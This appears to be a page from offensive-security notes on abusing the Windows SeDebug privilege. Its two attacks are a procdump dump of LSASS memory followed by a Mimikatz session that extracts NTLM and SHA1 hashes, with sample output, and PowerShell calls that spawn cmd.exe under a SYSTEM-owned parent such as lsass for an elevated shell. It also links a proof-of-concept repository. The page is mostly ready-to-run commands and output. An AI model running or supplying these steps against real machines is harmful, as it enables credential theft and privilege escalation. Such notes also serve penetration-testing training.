SeDebug

Allows to debug processes you don't own. This right may be assigned to developers who need to debug new system components as part of their day-to-day job.

Attack 1: Dump memory from a running process

Very often we target LSASS. First we dump the credentials from memory using procdump.exe from the sysinternal suite:

procdump.exe -accepteula -ma lsass.exe lsass.dmp

We can also dump from a RDP session: Take a manual memory dump of the LSASS process via the Task Manager by browsing to the Details tab, choosing the LSASS process, and selecting Create dump file.

Then we can extract the hashes from the memory dump using Mimikatz:

C:\hacker> mimikatz.exe

mimikatz # log
Using 'mimikatz.log' for logfile : OK

mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

mimikatz # sekurlsa::logonpasswords
Opening : 'lsass.dmp' file for minidump...

Authentication Id : 0 ; 23196355 (00000000:0161f2c3)
Session           : Interactive from 4
User Name         : DWM-4
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 3/31/2021 3:00:57 PM
SID               : S-1-5-90-0-4
        msv :
        tspkg :
        wdigest :
         * Username : WINLPE-SRV01$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
        ssp :
        credman :

<SNIP> 

Authentication Id : 0 ; 23026942 (00000000:015f5cfe)
Session           : RemoteInteractive from 2
User Name         : jordan
Domain            : WINLPE-SRV01
Logon Server      : WINLPE-SRV01
Logon Time        : 3/31/2021 2:59:52 PM
SID               : S-1-5-21-3769161915-3336846931-3985975925-1000
        msv :
         [00000003] Primary
         * Username : jordan
         * Domain   : WINLPE-SRV01
         * NTLM     : cf3a5525ee9414229e66279623ed5c58
         * SHA1     : 3c7374127c9a60f9e5b28d3a343eb7ac972367b2
        tspkg :
        wdigest :
         * Username : jordan
         * Domain   : WINLPE-SRV01
         * Password : (null)
        kerberos :
         * Username : jordan
         * Domain   : WINLPE-SRV01
         * Password : (null)
        ssp :
        credman :

<SNIP>

Attack 2: RCE

We can use this PoC script to spawn a child process from a parent process owned by SYSTEM (such as Winlogon or LSASS) and therefore impersonate it.

We must indicate the PID of the SYSTEM owned parent process and the command we want to execute in the child process we will create:

[MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>,"")

For example to get an elevated shell

[MyProcess]::CreateProcessFromParent(212,"c:\Windows\System32\cmd.exe","")

A shortcut using the process name instead of the PID with Get-Process cmdlet:

[MyProcess]::CreateProcessFromParent((Get-Process, "lsass").Id,"c:\Windows\System32\cmd.exe","")

There are also automated script to directly get an elevated shell:

https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations/SeDebugPrivilegePoC

PreviousSeImpersonate and SeAssignPrimaryToken NextSeTakeOwnership

Last updated 2 years ago